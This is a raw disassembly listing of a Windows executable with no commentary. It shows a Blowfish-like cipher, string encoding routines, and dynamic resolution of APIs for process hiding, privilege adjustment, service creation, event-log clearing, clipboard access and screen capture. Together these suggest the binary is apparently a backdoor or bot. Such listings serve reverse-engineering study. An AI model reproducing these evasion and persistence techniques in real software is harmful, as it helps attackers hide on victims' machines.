mov esi, 0FFh
and edx, esi
xor ecx, [eax+ebx*4+9D0h]
add ecx, [eax+edx*4+0EB8h]
mov edx, [ebp+arg_4]
xor ecx, [edi+40h]
xor ecx, [edx]
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+3Ch]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+38h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+34h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
xor edx, [eax+ebx*4+9D0h]
and edi, esi
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+30h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+2Ch]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+28h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+24h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+20h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor edx, [edi+1Ch]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
xor ebx, ebx
add edx, [eax+edi*4]
mov bl, byte ptr [ebp+var_4+1]
mov edi, [ebp+var_4]
xor edx, [eax+ebx*4+9D0h]
and edi, esi
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+18h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+14h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+10h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+0Ch]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+8]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
mov eax, [ebp+var_4]
xor edx, [edi+4]
xor eax, edx
mov edx, [edi]
xor edx, ecx
mov ecx, [ebp+arg_0]
pop edi
pop esi
mov [ecx], edx
mov ecx, [ebp+arg_4]
pop ebx
mov [ecx], eax
leave
retn 8
sub_416C29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416F9C proc near ; CODE XREF: sub_4170D6+76�p
; sub_417212+79�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
xor esi, esi
push edi
mov [ebp+var_8], ecx
xor eax, eax
loc_416FAC: ; CODE XREF: sub_416F9C+21�j
mov edx, [ecx]
mov edi, dword_441778[eax]
mov [eax+edx], edi
add eax, 4
cmp eax, 48h
jl short loc_416FAC
xor eax, eax
loc_416FC1: ; CODE XREF: sub_416F9C+41�j
mov edx, 13Ah
loc_416FC6: ; CODE XREF: sub_416F9C+3A�j
mov edi, [ecx+4]
mov ebx, dword_4417C0[eax]
mov [eax+edi], ebx
add eax, 4
dec edx
jnz short loc_416FC6
cmp eax, 13A0h
jl short loc_416FC1
mov ebx, [ebp+arg_0]
mov [ebp+var_4], esi
loc_416FE5: ; CODE XREF: sub_416F9C+A9�j
lea eax, [esi+1]
cdq
idiv [ebp+arg_4]
mov eax, [ebp+var_8]
movzx edi, byte ptr [esi+ebx]
mov eax, [eax]
shl edi, 18h
and edi, 0FF00FFFFh
movzx ecx, byte ptr [edx+ebx]
mov edx, [ebp+var_4]
add [ebp+var_4], 4
add edx, eax
lea eax, [esi+2]
mov [ebp+var_C], edx
cdq
idiv [ebp+arg_4]
shl ecx, 10h
xor ecx, edi
xor eax, eax
xor cx, cx
mov ah, [edx+ebx]
xor eax, ecx
mov ecx, eax
lea eax, [esi+3]
cdq
idiv [ebp+arg_4]
movzx eax, byte ptr [edx+ebx]
or ecx, eax
mov eax, [ebp+var_C]
xor [eax], ecx
lea eax, [esi+4]
cdq
idiv [ebp+arg_4]
cmp [ebp+var_4], 48h
mov esi, edx
jl short loc_416FE5
xor esi, esi
mov [ebp+arg_4], esi
mov [ebp+arg_0], esi
loc_41704F: ; CODE XREF: sub_416F9C+DC�j
mov edi, [ebp+var_8]
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+arg_4]
push eax
mov ecx, edi
call sub_4168B8
mov eax, [edi]
mov ecx, [ebp+arg_4]
mov [esi+eax], ecx
mov eax, [edi]
mov ecx, [ebp+arg_0]
mov [esi+eax+4], ecx
add esi, 8
cmp esi, 48h
jl short loc_41704F
push 4
pop esi
loc_41707D: ; CODE XREF: sub_416F9C+117�j
mov ebx, 9Dh
loc_417082: ; CODE XREF: sub_416F9C+10F�j
mov edi, [ebp+var_8]
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+arg_4]
push eax
mov ecx, edi
call sub_4168B8
mov eax, [edi+4]
mov ecx, [ebp+arg_4]
mov [esi+eax-4], ecx
mov eax, [edi+4]
mov ecx, [ebp+arg_0]
mov [esi+eax], ecx
add esi, 8
dec ebx
jnz short loc_417082
cmp esi, 13A4h
jl short loc_41707D
pop edi
pop esi
pop ebx
leave
retn 8
sub_416F9C endp
; =============== S U B R O U T I N E =======================================
sub_4170BC proc near ; CODE XREF: sub_417212+9A�p
; sub_417212+B5�p
arg_0 = byte ptr 4
xor eax, eax
loc_4170BE: ; CODE XREF: sub_4170BC+15�j
mov ecx, off_442B60
mov cl, [ecx+eax]
cmp cl, [esp+arg_0]
jz short locret_4170D5
inc eax
cmp eax, 40h
jl short loc_4170BE
xor eax, eax
locret_4170D5: ; CODE XREF: sub_4170BC+F�j
retn
sub_4170BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4170D6 proc near ; CODE XREF: sub_415603+1E�p
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push [ebp+arg_4]
mov esi, dword_437088
call esi ; dword_437088
add eax, 9
push eax
call sub_42B4D7
pop ecx
mov ebx, eax
push [ebp+arg_4]
push ebx
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_0]
test eax, eax
jz loc_41720C
cmp byte ptr [eax], 0
jz loc_41720C
push edi
mov edi, ebx
push [ebp+arg_4]
call esi ; dword_437088
lea eax, [eax+eax+12h]
push eax
call sub_42B4D7
cmp byte ptr [ebx], 0
pop ecx
mov [ebp+var_4], eax
jz short loc_417134
loc_41712E: ; CODE XREF: sub_4170D6+5C�j
inc edi
cmp byte ptr [edi], 0
jnz short loc_41712E
loc_417134: ; CODE XREF: sub_4170D6+56�j
xor eax, eax
lea ecx, [ebp+var_C]
stosd
stosd
call sub_416882
push [ebp+arg_0]
call esi ; dword_437088
push eax
lea ecx, [ebp+var_C]
push [ebp+arg_0]
call sub_416F9C
cmp byte ptr [ebx], 0
mov edi, [ebp+var_4]
mov esi, ebx
jz loc_4171F4
loc_41715F: ; CODE XREF: sub_4170D6+118�j
movzx eax, byte ptr [esi]
shl eax, 18h
inc esi
movzx ecx, byte ptr [esi]
shl ecx, 10h
add eax, ecx
inc esi
movzx ecx, byte ptr [esi]
shl ecx, 8
add eax, ecx
inc esi
movzx ecx, byte ptr [esi]
add eax, ecx
inc esi
mov [ebp+arg_0], eax
movzx eax, byte ptr [esi]
shl eax, 18h
inc esi
movzx ecx, byte ptr [esi]
shl ecx, 10h
add eax, ecx
inc esi
movzx ecx, byte ptr [esi]
shl ecx, 8
add eax, ecx
inc esi
movzx ecx, byte ptr [esi]
add eax, ecx
lea ecx, [ebp+var_C]
mov [ebp+arg_4], eax
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
inc esi
call sub_4168B8
push 6
pop eax
loc_4171B6: ; CODE XREF: sub_4170D6+F7�j
mov ecx, [ebp+arg_4]
mov edx, off_442B60
shr [ebp+arg_4], 6
and ecx, 3Fh
mov cl, [ecx+edx]
mov [edi], cl
inc edi
dec eax
jnz short loc_4171B6
push 6
pop eax
loc_4171D2: ; CODE XREF: sub_4170D6+113�j
mov ecx, [ebp+arg_0]
mov edx, off_442B60
shr [ebp+arg_0], 6
and ecx, 3Fh
mov cl, [ecx+edx]
mov [edi], cl
inc edi
dec eax
jnz short loc_4171D2
cmp byte ptr [esi], 0
jnz loc_41715F
loc_4171F4: ; CODE XREF: sub_4170D6+83�j
and byte ptr [edi], 0
push ebx
call sub_4290D0
pop ecx
lea ecx, [ebp+var_C]
call sub_4168A2
mov eax, [ebp+var_4]
pop edi
jmp short loc_41720E
; ---------------------------------------------------------------------------
loc_41720C: ; CODE XREF: sub_4170D6+2E�j
; sub_4170D6+37�j
mov eax, ebx
loc_41720E: ; CODE XREF: sub_4170D6+134�j
pop esi
pop ebx
leave
retn
sub_4170D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417212 proc near ; CODE XREF: sub_415641+1E�p
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push [ebp+arg_4]
mov esi, dword_437088
call esi ; dword_437088
add eax, 0Ch
push eax
call sub_42B4D7
pop ecx
mov ebx, eax
push [ebp+arg_4]
mov [ebp+var_8], ebx
push ebx
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_0]
test eax, eax
jz loc_41735C
cmp byte ptr [eax], 0
jz loc_41735C
push edi
mov edi, ebx
push [ebp+arg_4]
call esi ; dword_437088
add eax, 0Ch
push eax
call sub_42B4D7
cmp byte ptr [ebx], 0
pop ecx
mov [ebp+var_4], eax
jz short loc_417272
loc_41726C: ; CODE XREF: sub_417212+5E�j
inc edi
cmp byte ptr [edi], 0
jnz short loc_41726C
loc_417272: ; CODE XREF: sub_417212+58�j
xor eax, eax
lea ecx, [ebp+var_10]
stosd
stosd
stosd
call sub_416882
push [ebp+arg_0]
call esi ; dword_437088
push eax
lea ecx, [ebp+var_10]
push [ebp+arg_0]
call sub_416F9C
cmp byte ptr [ebx], 0
mov esi, [ebp+var_4]
mov edi, ebx
jz loc_417344
loc_41729E: ; CODE XREF: sub_417212+129�j
and [ebp+arg_0], 0
and [ebp+arg_4], 0
xor edx, edx
loc_4172A8: ; CODE XREF: sub_417212+AD�j
mov al, [edi]
inc edi
push eax
call sub_4170BC
pop ecx
mov ecx, edx
add edx, 6
shl eax, cl
or [ebp+arg_0], eax
cmp edx, 24h
jl short loc_4172A8
xor edx, edx
loc_4172C3: ; CODE XREF: sub_417212+C8�j
mov al, [edi]
inc edi
push eax
call sub_4170BC
pop ecx
mov ecx, edx
add edx, 6
shl eax, cl
or [ebp+arg_4], eax
cmp edx, 24h
jl short loc_4172C3
lea eax, [ebp+arg_0]
lea ecx, [ebp+var_10]
push eax
lea eax, [ebp+arg_4]
push eax
call sub_416C29
push 18h
xor edx, edx
pop eax
loc_4172F1: ; CODE XREF: sub_417212+FE�j
mov ebx, 0FFh
mov ecx, eax
shl ebx, cl
push 18h
sub eax, 8
pop ecx
sub ecx, edx
add edx, 8
and ebx, [ebp+arg_4]
shr ebx, cl
mov [esi], bl
inc esi
cmp eax, 0FFFFFFF8h
jg short loc_4172F1
push 18h
xor edx, edx
pop eax
loc_417317: ; CODE XREF: sub_417212+124�j
mov ebx, 0FFh
mov ecx, eax
shl ebx, cl
push 18h
sub eax, 8
pop ecx
sub ecx, edx
add edx, 8
and ebx, [ebp+arg_0]
shr ebx, cl
mov [esi], bl
inc esi
cmp eax, 0FFFFFFF8h
jg short loc_417317
cmp byte ptr [edi], 0
jnz loc_41729E
mov ebx, [ebp+var_8]
loc_417344: ; CODE XREF: sub_417212+86�j
and byte ptr [esi], 0
push ebx
call sub_4290D0
pop ecx
lea ecx, [ebp+var_10]
call sub_4168A2
mov eax, [ebp+var_4]
pop edi
jmp short loc_41735E
; ---------------------------------------------------------------------------
loc_41735C: ; CODE XREF: sub_417212+31�j
; sub_417212+3A�j
mov eax, ebx
loc_41735E: ; CODE XREF: sub_417212+148�j
pop esi
pop ebx
leave
retn
sub_417212 endp
; =============== S U B R O U T I N E =======================================
sub_417362 proc near ; CODE XREF: sub_418E0F+A�p
push ebx
push ebp
mov ebp, dword_437070
push esi
push edi
push offset aKernel32_dll_1 ; "kernel32.dll"
call ebp ; dword_437070
mov esi, dword_437030
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_41748E
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; dword_437030
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov dword_457004, eax
call esi ; dword_437030
push offset aProcess32first ; "Process32First"
push edi
mov dword_456F60, eax
call esi ; dword_437030
push offset aProcess32next ; "Process32Next"
push edi
mov dword_456F3C, eax
call esi ; dword_437030
push offset aModule32first ; "Module32First"
push edi
mov dword_456E0C, eax
call esi ; dword_437030
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov dword_456DB0, eax
call esi ; dword_437030
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov dword_456DDC, eax
call esi ; dword_437030
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov dword_456E6C, eax
call esi ; dword_437030
push offset aSearchpatha ; "SearchPathA"
push edi
mov dword_456FA8, eax
call esi ; dword_437030
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov dword_457020, eax
call esi ; dword_437030
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov dword_456E1C, eax
call esi ; dword_437030
push offset aGetcomputernam ; "GetComputerNameA"
push edi
mov dword_456DF8, eax
call esi ; dword_437030
cmp dword_457004, ebx
mov dword_456F90, eax
jz short loc_417475
cmp dword_456F60, ebx
jz short loc_417475
cmp dword_456F3C, ebx
jz short loc_417475
cmp dword_456E0C, ebx
jz short loc_417475
cmp dword_456DDC, ebx
jz short loc_417475
cmp dword_456E6C, ebx
jz short loc_417475
cmp dword_456FA8, ebx
jz short loc_417475
cmp dword_457020, ebx
jz short loc_417475
cmp dword_456E1C, ebx
jz short loc_417475
cmp dword_456DF8, ebx
jz short loc_417475
cmp eax, ebx
jnz short loc_41747F
loc_417475: ; CODE XREF: sub_417362+C5�j
; sub_417362+CD�j ...
mov dword_457024, 1
loc_41747F: ; CODE XREF: sub_417362+111�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; dword_437030
mov dword_456F74, eax
jmp short loc_4174A3
; ---------------------------------------------------------------------------
loc_41748E: ; CODE XREF: sub_417362+1D�j
call dword_437170 ; RtlGetLastWin32Error
mov dword_457028, eax
mov dword_457024, 1
loc_4174A3: ; CODE XREF: sub_417362+12A�j
push offset aUser32_dll ; "user32.dll"
call dword_437034 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_4175F7
push offset aClosewindow ; "CloseWindow"
push edi
call esi ; dword_437030
push offset aSendmessagea ; "SendMessageA"
push edi
mov dword_456E80, eax
call esi ; dword_437030
push offset aFindwindowa ; "FindWindowA"
push edi
mov dword_456F9C, eax
call esi ; dword_437030
push offset aIswindow ; "IsWindow"
push edi
mov dword_456F44, eax
call esi ; dword_437030
push offset aDestroywindow ; "DestroyWindow"
push edi
mov dword_456EB0, eax
call esi ; dword_437030
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov dword_457008, eax
call esi ; dword_437030
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov dword_456EF4, eax
call esi ; dword_437030
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov dword_456F24, eax
call esi ; dword_437030
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov dword_456F94, eax
call esi ; dword_437030
cmp dword_456E80, ebx
mov dword_456E3C, eax
jz short loc_417571
cmp dword_456F9C, ebx
jz short loc_417571
cmp dword_456F44, ebx
jz short loc_417571
cmp dword_456EB0, ebx
jz short loc_417571
cmp dword_457008, ebx
jz short loc_417571
cmp dword_456EF4, ebx
jz short loc_417571
cmp dword_456F24, ebx
jz short loc_417571
cmp dword_456F94, ebx
jz short loc_417571
cmp eax, ebx
jnz short loc_41757B
loc_417571: ; CODE XREF: sub_417362+1D1�j
; sub_417362+1D9�j ...
mov dword_45702C, 1
loc_41757B: ; CODE XREF: sub_417362+20D�j
push offset aEnumwindows ; "EnumWindows"
push edi
call esi ; dword_437030
push offset aGetwindowinfo ; "GetWindowInfo"
push edi
mov dword_456FEC, eax
call esi ; dword_437030
push offset aGetwindowthrea ; "GetWindowThreadProcessId"
push edi
mov dword_456EC8, eax
call esi ; dword_437030
push offset aShowwindow ; "ShowWindow"
push edi
mov dword_456DEC, eax
call esi ; dword_437030
push offset aIswindowvisibl ; "IsWindowVisible"
push edi
mov dword_456ECC, eax
call esi ; dword_437030
push offset aGetclassnamea ; "GetClassNameA"
push edi
mov dword_456EF8, eax
call esi ; dword_437030
cmp dword_456FEC, ebx
mov dword_457014, eax
jz short loc_417602
cmp dword_456EC8, ebx
jz short loc_417602
cmp dword_456DEC, ebx
jz short loc_417602
cmp dword_456ECC, ebx
jz short loc_417602
cmp dword_456EF8, ebx
jz short loc_417602
cmp eax, ebx
jnz short loc_41760C
jmp short loc_417602
; ---------------------------------------------------------------------------
loc_4175F7: ; CODE XREF: sub_417362+150�j
call dword_437170 ; RtlGetLastWin32Error
mov dword_457030, eax
loc_417602: ; CODE XREF: sub_417362+26D�j
; sub_417362+275�j ...
mov dword_45702C, 1
loc_41760C: ; CODE XREF: sub_417362+291�j
push offset aAdvapi32_dll ; "advapi32.dll"
call dword_437034 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_4178FE
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; dword_437030
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov dword_456FC0, eax
call esi ; dword_437030
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov dword_456ED4, eax
call esi ; dword_437030
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov dword_456F64, eax
call esi ; dword_437030
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov dword_456DF0, eax
call esi ; dword_437030
push offset aRegdeletekeya ; "RegDeleteKeyA"
push edi
mov dword_456E64, eax
call esi ; dword_437030
push offset aRegclosekey ; "RegCloseKey"
push edi
mov dword_456E98, eax
call esi ; dword_437030
push offset aRegenumkeyexa ; "RegEnumKeyExA"
push edi
mov dword_456F08, eax
call esi ; dword_437030
push offset aRegenumvaluea ; "RegEnumValueA"
push edi
mov dword_456E68, eax
call esi ; dword_437030
push offset aRegqueryinfoke ; "RegQueryInfoKeyA"
push edi
mov dword_456E04, eax
call esi ; dword_437030
cmp dword_456FC0, ebx
mov dword_456EC4, eax
jz short loc_4176E7
cmp dword_456ED4, ebx
jz short loc_4176E7
cmp dword_456F64, ebx
jz short loc_4176E7
cmp dword_456DF0, ebx
jz short loc_4176E7
cmp dword_456E64, ebx
jz short loc_4176E7
cmp dword_456E98, ebx
jz short loc_4176E7
cmp dword_456F08, ebx
jz short loc_4176E7
cmp dword_456E04, ebx
jz short loc_4176E7
cmp eax, ebx
jnz short loc_4176F1
loc_4176E7: ; CODE XREF: sub_417362+347�j
; sub_417362+34F�j ...
mov dword_457034, 1
loc_4176F1: ; CODE XREF: sub_417362+383�j
push offset aOpenthreadtoke ; "OpenThreadToken"
push edi
call esi ; dword_437030
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
mov dword_456E48, eax
call esi ; dword_437030
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov dword_456F18, eax
call esi ; dword_437030
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov dword_456EDC, eax
call esi ; dword_437030
cmp dword_456E48, ebx
mov dword_456FB4, eax
jz short loc_417741
cmp dword_456F18, ebx
jz short loc_417741
cmp dword_456EDC, ebx
jz short loc_417741
cmp eax, ebx
jnz short loc_41774B
loc_417741: ; CODE XREF: sub_417362+3C9�j
; sub_417362+3D1�j ...
mov dword_457034, 1
loc_41774B: ; CODE XREF: sub_417362+3DD�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; dword_437030
push offset aOpenservicea ; "OpenServiceA"
push edi
mov dword_456F28, eax
call esi ; dword_437030
push offset aStartservicea ; "StartServiceA"
push edi
mov dword_456DC8, eax
call esi ; dword_437030
push offset aControlservice ; "ControlService"
push edi
mov dword_456DD0, eax
call esi ; dword_437030
push offset aDeleteservice ; "DeleteService"
push edi
mov dword_456E44, eax
call esi ; dword_437030
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov dword_456E50, eax
call esi ; dword_437030
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov dword_456DE4, eax
call esi ; dword_437030
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov dword_456EE0, eax
call esi ; dword_437030
push offset aCreateservicea ; "CreateServiceA"
push edi
mov dword_456DD4, eax
call esi ; dword_437030
push offset aStartservicect ; "StartServiceCtrlDispatcherA"
push edi
mov dword_456FB8, eax
call esi ; dword_437030
push offset aImpersonatelog ; "ImpersonateLoggedOnUser"
push edi
mov dword_45701C, eax
call esi ; dword_437030
push offset aLockservicedat ; "LockServiceDatabase"
push edi
mov dword_45700C, eax
call esi ; dword_437030
push offset aQueryservicelo ; "QueryServiceLockStatusA"
push edi
mov dword_456E00, eax
call esi ; dword_437030
push offset aChangeservicec ; "ChangeServiceConfig2A"
push edi
mov dword_456E88, eax
call esi ; dword_437030
push offset aUnlockserviced ; "UnlockServiceDatabase"
push edi
mov dword_457010, eax
call esi ; dword_437030
push offset aRegisterserv_0 ; "RegisterServiceCtrlHandlerA"
push edi
mov dword_456F54, eax
call esi ; dword_437030
push offset aSetservicestat ; "SetServiceStatus"
push edi
mov dword_456F50, eax
call esi ; dword_437030
cmp dword_456F28, ebx
mov dword_456E70, eax
jz short loc_41789C
cmp dword_456DC8, ebx
jz short loc_41789C
cmp dword_456DD0, ebx
jz short loc_41789C
cmp dword_456E44, ebx
jz short loc_41789C
cmp dword_456E50, ebx
jz short loc_41789C
cmp dword_456DE4, ebx
jz short loc_41789C
cmp dword_456EE0, ebx
jz short loc_41789C
cmp dword_456DD4, ebx
jz short loc_41789C
cmp dword_45700C, ebx
jz short loc_41789C
cmp dword_456E00, ebx
jz short loc_41789C
cmp dword_456E88, ebx
jz short loc_41789C
cmp dword_457010, ebx
jz short loc_41789C
cmp dword_456F54, ebx
jz short loc_41789C
cmp dword_456F50, ebx
jz short loc_41789C
cmp eax, ebx
jnz short loc_4178A6
loc_41789C: ; CODE XREF: sub_417362+4CC�j
; sub_417362+4D4�j ...
mov dword_457034, 1
loc_4178A6: ; CODE XREF: sub_417362+538�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; dword_437030
cmp eax, ebx
mov dword_456DCC, eax
jnz short loc_4178C1
mov dword_457034, 1
loc_4178C1: ; CODE XREF: sub_417362+553�j
push offset aCleareventloga ; "ClearEventLogA"
push edi
call esi ; dword_437030
push offset aOpeneventloga ; "OpenEventLogA"
push edi
mov dword_456EA0, eax
call esi ; dword_437030
push offset aCloseeventlog ; "CloseEventLog"
push edi
mov dword_456E90, eax
call esi ; dword_437030
cmp dword_456EA0, ebx
mov dword_456E4C, eax
jz short loc_417909
cmp dword_456E90, ebx
jz short loc_417909
cmp eax, ebx
jnz short loc_417913
jmp short loc_417909
; ---------------------------------------------------------------------------
loc_4178FE: ; CODE XREF: sub_417362+2B9�j
call dword_437170 ; RtlGetLastWin32Error
mov dword_45703C, eax
loc_417909: ; CODE XREF: sub_417362+58C�j
; sub_417362+594�j ...
mov dword_457034, 1
loc_417913: ; CODE XREF: sub_417362+598�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; dword_437070
mov edi, eax
cmp edi, ebx
jz loc_4179DF
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; dword_437030
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov dword_456F20, eax
call esi ; dword_437030
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov dword_456F80, eax
call esi ; dword_437030
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov dword_456F88, eax
call esi ; dword_437030
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov dword_456F40, eax
call esi ; dword_437030
push offset aSelectobject ; "SelectObject"
push edi
mov dword_456E24, eax
call esi ; dword_437030
push offset aBitblt ; "BitBlt"
push edi
mov dword_456DC0, eax
call esi ; dword_437030
push offset aDeletedc ; "DeleteDC"
push edi
mov dword_456F84, eax
call esi ; dword_437030
push offset aDeleteobject ; "DeleteObject"
push edi
mov dword_456DAC, eax
call esi ; dword_437030
cmp dword_456F20, ebx
mov dword_456E5C, eax
jz short loc_4179EA
cmp dword_456F80, ebx
jz short loc_4179EA
cmp dword_456F88, ebx
jz short loc_4179EA
cmp dword_456F40, ebx
jz short loc_4179EA
cmp dword_456E24, ebx
jz short loc_4179EA
cmp dword_456DC0, ebx
jz short loc_4179EA
cmp dword_456F84, ebx
jz short loc_4179EA
